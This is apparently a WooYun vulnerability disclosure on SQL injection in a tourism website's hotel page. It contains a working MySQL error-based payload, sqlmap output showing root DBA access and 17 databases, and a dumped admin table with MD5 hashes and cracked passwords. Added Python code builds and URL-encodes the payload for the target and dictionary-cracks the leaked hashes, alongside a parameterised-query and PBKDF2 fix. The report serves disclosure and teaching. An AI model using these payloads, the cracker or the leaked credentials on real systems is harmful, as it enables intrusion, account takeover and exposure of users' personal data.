WooYun (WooYun.org) historical vulnerability search: http://wy.zone.ci/
WooYun Drops articles online: http://drop.zone.ci/
2015-12-04: Details reported to the vendor, awaiting vendor response
2015-12-08: Vendor confirmed; details disclosed to the vendor only
2015-12-18: Details disclosed to core whitehats and relevant domain experts
2015-12-28: Details disclosed to ordinary whitehats
2016-01-05: Vendor has fixed the vulnerability and disclosed it proactively; details public
SQL injection on the main site of 清境旅遊資訊網 (Cingjing Tourism Information Site) (DBA privileges / 17 databases exposed / nearly 500 user accounts affected / MD5 password hashes crackable)
0x01 Injection point
http://**.**.**.**/sub/hotelview.asp?hno=182
Error-based injection: the injected query fails and the database error surfaces in an HTTP 500 page.
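The injection point is an integer query-string parameter (hno) pasted straight into the SQL text. The following Python is an added illustration, not code from the report or from the site (which runs classic ASP over MySQL on IIS 6); it reproduces the pattern on an in-memory SQLite table with assumed table and column names (hotel, hno, name) and puts the type-checked, parameterised replacement next to it.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the site's hotel records."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE hotel (hno INTEGER PRIMARY KEY, name TEXT)")
    con.executemany("INSERT INTO hotel VALUES (?, ?)",
                    [(181, "Hotel A"), (182, "Hotel B"), (183, "Hotel C")])
    return con

def hotelview_vulnerable(con: sqlite3.Connection, hno: str) -> list:
    """Assumed shape of hotelview.asp?hno=...: the raw parameter becomes part of the SQL.
    Anything after the number is executed as SQL, which is what sqlmap exploited."""
    return con.execute(f"SELECT hno, name FROM hotel WHERE hno={hno}").fetchall()

def hotelview_fixed(con: sqlite3.Connection, hno: str):
    """Hardened form: reject non-integers (return None, i.e. HTTP 400) and bind the
    value as a parameter so the database never parses it as SQL."""
    try:
        n = int(hno)
    except ValueError:
        return None
    return con.execute("SELECT hno, name FROM hotel WHERE hno=?", (n,)).fetchall()

if __name__ == "__main__":
    con = make_db()
    print(hotelview_vulnerable(con, "182"))            # one row
    print(hotelview_vulnerable(con, "182 OR 1=1"))     # every row: the WHERE clause was rewritten
    print(hotelview_vulnerable(con, "182 AND 1=2"))    # no rows: a boolean probe works too
    print(hotelview_fixed(con, "182 OR 1=1"))          # None: rejected before reaching the database
```

The boolean probe in the third call is the same primitive sqlmap starts from; the error-based technique in the next section only makes it faster by pulling whole strings out of one error message instead of one bit per request.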
0x02 Running as root
Place: GET
Parameter: hno
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: hno=182 AND (SELECT 3471 FROM(SELECT COUNT(*),CONCAT(0x3a7878793a,(SELECT (CASE WHEN (3471=3471) THEN 1 ELSE 0 END)),0x3a716b6e3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[13:19:35] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5.0
[13:19:35] [INFO] fetching current user
[13:19:36] [INFO] retrieved: root@localhost
current user: 'root@localhost'
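The sqlmap payload above is the classic MySQL duplicate-key error-based technique. FLOOR(RAND(0)*2) is seeded, so it yields a fixed sequence (0,1,1,0,1,1,...); while GROUP BY fills its temporary table, the key is computed once for the lookup and again for the insert, so the second evaluation collides with a row already present and MySQL raises ER_DUP_ENTRY. Because the key is CONCAT(delimiter, subquery, delimiter, 0|1), the subquery's result is echoed inside the error text, which the ASP page then returns as an HTTP 500. The following Python is an added example, not sqlmap's code or the report's: it builds that payload for an arbitrary scalar subquery, reproducing the report's payload exactly when given its CASE expression, and parses the result back out of a constructed error page (the sample response body is made up for the example, not captured from the target).

```python
import re
from urllib.parse import quote

# Delimiters used by the report's payload: 0x3a7878793a is ':xxy:', 0x3a716b6e3a is ':qkn:'.
START, STOP = ":xxy:", ":qkn:"

def mysql_hex(s: str) -> str:
    """Encode a string as a MySQL hex literal so the payload needs no quote characters."""
    return "0x" + s.encode().hex()

def error_based_payload(subquery: str, hno: int = 182, tag: int = 3471) -> str:
    """Value for the hno parameter. `subquery` must return exactly one scalar; its result is
    wrapped in START/STOP so it can be recognised inside the duplicate-key error message."""
    inner = (f"SELECT COUNT(*),CONCAT({mysql_hex(START)},({subquery}),{mysql_hex(STOP)},"
             f"FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x")
    return f"{hno} AND (SELECT {tag} FROM({inner})a)"

def inject_url(base: str, subquery: str) -> str:
    """Full request URL with the payload URL-encoded into the hno parameter."""
    return f"{base}?hno={quote(error_based_payload(subquery), safe='')}"

# MySQL 5.0 says "for key 1", 5.1+ says "for key 'group_key'"; match both.
_DUP = re.compile(re.escape(START) + r"(.*?)" + re.escape(STOP) + r"[01]' for key")

def extract(response_body: str):
    """Return the injected subquery's result from an error page, or None if nothing leaked."""
    m = _DUP.search(response_body)
    return m.group(1) if m else None

# Constructed sample of an IIS/ASP ODBC error page; not a real capture from the target.
SAMPLE_500 = (
    "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'\n"
    "[MySQL][ODBC 3.51 Driver][mysqld-5.0]Duplicate entry ':xxy:root@localhost:qkn:1' for key 1\n"
    "/sub/hotelview.asp, line 23"
)

if __name__ == "__main__":
    print(inject_url("http://**.**.**.**/sub/hotelview.asp", "SELECT CURRENT_USER()"))
    print(extract(SAMPLE_500))  # root@localhost
```

One caveat when reusing this: ER_DUP_ENTRY truncates the echoed key to 64 characters, so longer values (a column list, a long hash concatenation) have to be fetched in slices with MID(), which is what sqlmap does behind the scenes.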
0x03 And it is a DBA
[13:20:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5.0
[13:20:47] [INFO] testing if current user is DBA
[13:20:47] [INFO] fetching current user
[13:20:47] [INFO] resumed: root@localhost
[13:20:47] [INFO] retrieved: 1
current user is DBA: 'True'

Because the application's own connection runs as root@localhost, the injection is not confined to the hotel database: every schema listed in 0x04, mysql.user included, is readable through it. The fix therefore has two parts: the parameterised query, and a dedicated MySQL account for the web application whose privileges are limited to the tables it actually needs.
0x04 17 databases exposed
available databases [17]:
[*] cja
[*] db
[*] dbcount
[*] dbforguestbooks
[*] dbforhotel
[*] dbformb
[*] dbformbbooks
[*] dbforpanel
[*] dbforweb
[*] dbforwork
[*] download
[*] imagebooks
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] user

Four of these (information_schema, mysql, performance_schema, test) are MySQL's own schemas; the remaining 13 are application databases.
Affected users
Database: dbforhotel [78 tables]
ad, ad_news, ad_set, admrun, album, album_photo, banner, bannertype, cafe, cafepic,
consultation, coupon, couponstyle, culture, epaper, excelfile, gbooksset, guide, guidepic, hhotelnews,
hightrip, hightripic, hlink, holiday, holiday_memo, hotel, hpictext, keyword, keyword_t, l_map,
link, link_friend, linkclass, login, mail, mailclass, mappost, maprepost, menubutton, menubuttonclass,
message, mountainphoto, nature, newsad, newsad_1, newskeyword, order_room, order_room_set, photo, present,
project, restaurant, restaurantpic, room, room_number, roomlive, roomlive1, roomliveday, sendmail, service,
setting, shop, shopic, shownk, showphoto, sitemap, sitemapclass, specialty, sub_news, sub_p,
traffic_need, trafficservice, trip, trip_turn, tripic, triplan, triplanday, worknew
Table: login [22 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| lAddress     | varchar(255) |
| lBirthday    | datetime     |
| lCreatTime   | datetime     |
| lEarning     | varchar(1)   |
| lEducation   | varchar(1)   |
| lEmail       | varchar(100) |
| lEnable      | varchar(1)   |
| lGender      | varchar(1)   |
| lHasChildren | varchar(1)   |
| lHobby       | varchar(2)   |
| lLoginTime   | datetime     |
| lMarriage    | varchar(1)   |
| lMobile      | varchar(25)  |
| lName        | varchar(100) |
| lNickname    | varchar(10)  |
| lNo          | int(11)      |
| lOccupation  | varchar(2)   |
| lPassword    | varchar(32)  |
| lSSN         | varchar(10)  |
| lssnRadio    | varchar(1)   |
| lSubscribe   | varchar(1)   |
| lTel         | varchar(25)  |
+--------------+--------------+

lPassword is varchar(32), the length of a hex MD5 digest, which matches the unsalted MD5 hashes seen in the admin table below; the same table also holds an lSSN column and full contact details in the clear.
268 accounts, including e-mail addresses, mobile numbers, postal addresses and so on.
Database: dbforhotel
+-------+---------+
| Table | Entries |
+-------+---------+
| login | 146     |
+-------+---------+

+-------+---------+
| Table | Entries |
+-------+---------+
| login | 268     |
+-------+---------+
Database: cja
+---------+---------+
| Table   | Entries |
+---------+---------+
| cjauser | 22      |
+---------+---------+
One record retrieved field by field (runs of '?' are non-ASCII characters lost in the dump's encoding):

[14:01:05] [INFO] retrieved: 0956-993031
[14:01:05] [INFO] retrieved: http://**.**.**.**/
[14:01:05] [INFO] retrieved: dddddd
[14:01:05] [INFO] retrieved: athena20070131u.doc
[14:01:06] [INFO] retrieved: ddddd
[14:01:06] [INFO] retrieved: ccss
[14:01:06] [INFO] retrieved: ../index.asp
[14:01:06] [INFO] retrieved:
[14:01:07] [INFO] retrieved: ????????????80?
[14:01:07] [INFO] retrieved:
[14:01:07] [INFO] retrieved: 2006-10-02 19:52:42
[14:01:07] [INFO] retrieved:
[14:01:07] [INFO] retrieved:
[14:01:08] [INFO] retrieved: www.jiamaei@**.**.**.**
[14:01:08] [INFO] retrieved: 0
[14:01:08] [INFO] retrieved:
[14:01:08] [INFO] retrieved:
[14:01:09] [INFO] retrieved:
[14:01:09] [INFO] retrieved: 2010-09-08 07:42:29
[14:01:09] [INFO] retrieved:
[14:01:09] [INFO] retrieved:
[14:01:10] [INFO] retrieved: ????
[14:01:10] [INFO] retrieved:
[14:01:10] [INFO] retrieved: 2
[14:01:10] [INFO] retrieved:
[14:01:10] [INFO] retrieved: 4291eca9f56529f463d90f7e35278568
[14:01:11] [INFO] retrieved:
[14:01:11] [INFO] retrieved: 1
[14:01:11] [INFO] retrieved: 049-2803940
[14:01:11] [INFO] retrieved: 049-2803941
[14:01:12] [INFO] retrieved: jiamaei
[14:01:12] [INFO] retrieved: d01d02d03d08d09d10d11d12d13d18d19d20d21
[14:01:12] [INFO] retrieved: ??????????
[14:01:12] [INFO] retrieved:
[14:01:13] [INFO] retrieved: 2010-08-31 00:00:00
[14:01:13] [INFO] retrieved: 2010-07-10 00:00:00
Some of the administrator accounts:
[22 entries]
+-------+-------+---------------------+----------+---------+--------+------+-----------------------------------------+-------+
| cuAdm | cuBaB | cuCreatTime         | cuEnable | cuID    | cuName | cuNo | cuPassword                              | cuRes |
+-------+-------+---------------------+----------+---------+--------+------+-----------------------------------------+-------+
| 0     | 1     | 2006-08-10 16:36:36 | 1        | 401     | ?????? | 2    | 816b112c6105b3ebd537828a39af4818 (401)  | 0     |
| 0     | 1     | 2006-08-16 09:16:29 | 1        | 402     | ???    | 14   | 69cb3ea317a32c4e6143e665fdb20b14 (402)  | 1     |
| 0     | 0     | 2006-08-16 09:45:06 | 1        | 403     | ?????? | 15   | bbf94b34eb32268ada57a3be5062fe7d        | 0     |
| 0     | 0     | 2006-08-17 14:30:40 | 1        | 404     | ???    | 21   | 4f4adcbf8c6f66dcfc8a3282ac2bf10a        | 0     |
| 0     | 0     | 2006-08-18 10:24:08 | 1        | 405     | ????   | 22   | bbcbff5c1f1ded46c25d28119a85c6c2        | 0     |
| 0     | 1     | 2006-08-18 11:02:35 | 1        | 406     | ????   | 23   | 8cb22bdd0b7ba1ab13d742e22eed8da2 (406)  | 0     |
| 0     | 1     | 2006-08-18 11:29:26 | 1        | 407     | ???    | 24   | f4f6dce2f3a0f9dada0c2b5b66452017        | 0     |
| 0     | 1     | 2006-08-18 11:37:15 | 1        | 408     | ????   | 25   | 0d0fd7c6e093f7b804fa0150b875b868        | 0     |
| 0     | 1     | 2006-08-18 11:47:12 | 1        | 409     | ????   | 26   | a96b65a721e561e1e3de768ac819ffbb (409)  | 0     |
| 0     | 0     | 2006-08-18 11:55:38 | 1        | 410     | ????   | 27   | 1068c6e4c8051cfd4e9ea8072e3189e2        | 0     |
| 0     | 0     | 2006-08-18 12:08:59 | 1        | 411     | ?????  | 28   | 17d63b1625c816c22647a73e1482372b (411)  | 0     |
| 0     | 0     | 2006-08-18 12:16:10 | 1        | 412     | ????   | 29   | b9228e0962a78b84f3d5d92f4faa000b        | 0     |
| 0     | 0     | 2006-08-18 12:29:41 | 1        | 413     | ????   | 30   | 0deb1c54814305ca9ad266f53bc82511 (413)  | 0     |
| 0     | 0     | 2006-08-15 09:58:30 | 1        | 501     | ???    | 13   | 5b69b9cb83065d403869739ae7f0995e (501)  | 1     |
| 0     | 0     | 2006-08-17 08:58:11 | 1        | 502     | ???    | 16   | b337e84de8752b27eda3a12363109e80 (504)  | 1     |
| 0     | 1     | 2006-08-17 09:59:21 | 1        | 503     | ????   | 17   | b337e84de8752b27eda3a12363109e80 (504)  | 1     |
| 0     | 1     | 2006-08-17 10:10:01 | 1        | 504     | ????   | 18   | b337e84de8752b27eda3a12363109e80 (504)  | 1     |
| 0     | 1     | 2006-08-17 10:13:51 | 1        | 505     | ????   | 19   | e8c0653fea13f91bf3c48159f7c24f78        | 1     |
| 0     | 0     | 2006-08-18 15:28:57 | 1        | 506     | ???    | 31   | ff4d5fbbafdf976cfdc032e3bde78de5 (506)  | 0     |
| 1     | 0     | 2006-08-19 14:16:55 | 1        | adm2006 | adm    | 32   | a4fa8d76cc8d25e6e1ad5a772dd951a5        | 0     |
| 1     | 0     | 2006-08-10 15:47:17 | 1        | arch    | ????   | 1    | d6194c68fcc7e79bb57401be603cb1cc (arch) | 0     |
| 1     | 0     | 2008-09-20 15:14:16 | 1        | sunny   | sunny  | 33   | 4187db82d9b3c103dc996029dd723f55        | 0     |
+-------+-------+---------------------+----------+---------+--------+------+-----------------------------------------+-------+

cuPassword is an unsalted MD5; the value in parentheses after a hash is the plaintext sqlmap recovered with its built-in dictionary. Read that way, the dump already tells the story: accounts 401, 402, 406, 409, 411, 413, 501 and 506 use their own account ID as the password, arch uses its username, and 502, 503 and 504 share a single hash, i.e. the same password (504). The three rows with cuAdm=1 (adm2006, arch, sunny) are the ones with the administrative flag.
A few more, cracked on the cmd5 website: sunny / rich230, arch / arch, adm / adm2006.

5 database users
[13:49:50] [INFO] retrieved: 5
Database: mysql
+-------+---------+
| Table | Entries |
+-------+---------+
| user  | 5       |
+-------+---------+
Including root / root.
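Why the cjauser hashes fell so easily, as an added example (not code from the report or the site): with unsalted MD5, one digest per candidate word cracks every account at once, and identical passwords produce identical hashes, which is how the shared 502/503/504 hash is visible in the dump without cracking anything. The (cuID, cuPassword) pairs below are transcribed from the table above; the cracking wordlist and the PBKDF2 replacement are assumptions of the example, and md5 of "root" and "password" are used in the self-check because those two digests are well known.

```python
import hashlib
import hmac
import os

# (cuID, cuPassword) transcribed from the cjauser dump in the report.
CJAUSER_HASHES = [
    ("401", "816b112c6105b3ebd537828a39af4818"), ("402", "69cb3ea317a32c4e6143e665fdb20b14"),
    ("403", "bbf94b34eb32268ada57a3be5062fe7d"), ("404", "4f4adcbf8c6f66dcfc8a3282ac2bf10a"),
    ("405", "bbcbff5c1f1ded46c25d28119a85c6c2"), ("406", "8cb22bdd0b7ba1ab13d742e22eed8da2"),
    ("407", "f4f6dce2f3a0f9dada0c2b5b66452017"), ("408", "0d0fd7c6e093f7b804fa0150b875b868"),
    ("409", "a96b65a721e561e1e3de768ac819ffbb"), ("410", "1068c6e4c8051cfd4e9ea8072e3189e2"),
    ("411", "17d63b1625c816c22647a73e1482372b"), ("412", "b9228e0962a78b84f3d5d92f4faa000b"),
    ("413", "0deb1c54814305ca9ad266f53bc82511"), ("501", "5b69b9cb83065d403869739ae7f0995e"),
    ("502", "b337e84de8752b27eda3a12363109e80"), ("503", "b337e84de8752b27eda3a12363109e80"),
    ("504", "b337e84de8752b27eda3a12363109e80"), ("505", "e8c0653fea13f91bf3c48159f7c24f78"),
    ("506", "ff4d5fbbafdf976cfdc032e3bde78de5"), ("adm2006", "a4fa8d76cc8d25e6e1ad5a772dd951a5"),
    ("arch", "d6194c68fcc7e79bb57401be603cb1cc"), ("sunny", "4187db82d9b3c103dc996029dd723f55"),
]

def shared_hashes(rows):
    """Unsalted hashing leaks password reuse directly: group accounts by hash and
    return only the hashes used by more than one account."""
    by_hash = {}
    for uid, h in rows:
        by_hash.setdefault(h.lower(), []).append(uid)
    return {h: ids for h, ids in by_hash.items() if len(ids) > 1}

def crack_md5(hashes, wordlist):
    """Dictionary attack: hash each candidate once, then look every target up in the
    table. Cost is proportional to the wordlist, not to the number of accounts."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {h: table[h] for h in (x.lower() for x in hashes) if h in table}

def hash_password(password: str, iterations: int = 200_000) -> str:
    """Replacement storage format: per-user random salt plus a slow KDF (PBKDF2-HMAC-SHA256).
    The salt defeats the shared table above; the iteration count makes each guess expensive."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2${iterations}${salt.hex()}${dk.hex()}"

def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    print(shared_hashes(CJAUSER_HASHES))
    # Assumed wordlist: every cuID (the dump's annotations show IDs were used as passwords)
    # plus the plaintexts the report obtained from cmd5.
    wordlist = [uid for uid, _ in CJAUSER_HASHES] + ["rich230", "adm2006", "arch"]
    print(crack_md5({h for _, h in CJAUSER_HASHES}, wordlist))
    stored = hash_password("rich230")
    print(stored, verify_password("rich230", stored), verify_password("rich231", stored))
```

Two stored values for the same password differ because each carries its own salt, so a leaked table no longer reveals which users share a password, and a precomputed MD5 lookup such as cmd5 is useless against it.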
0x05 There is also a file upload; I stared at it for a long time and could not work it out: http://**.**.**.**/tmpuugvi.asp
Severity: High
Vulnerability rank: 18
Confirmed: 2015-12-08 06:15
Thank you for the report.
2016-01-05: Fix confirmed.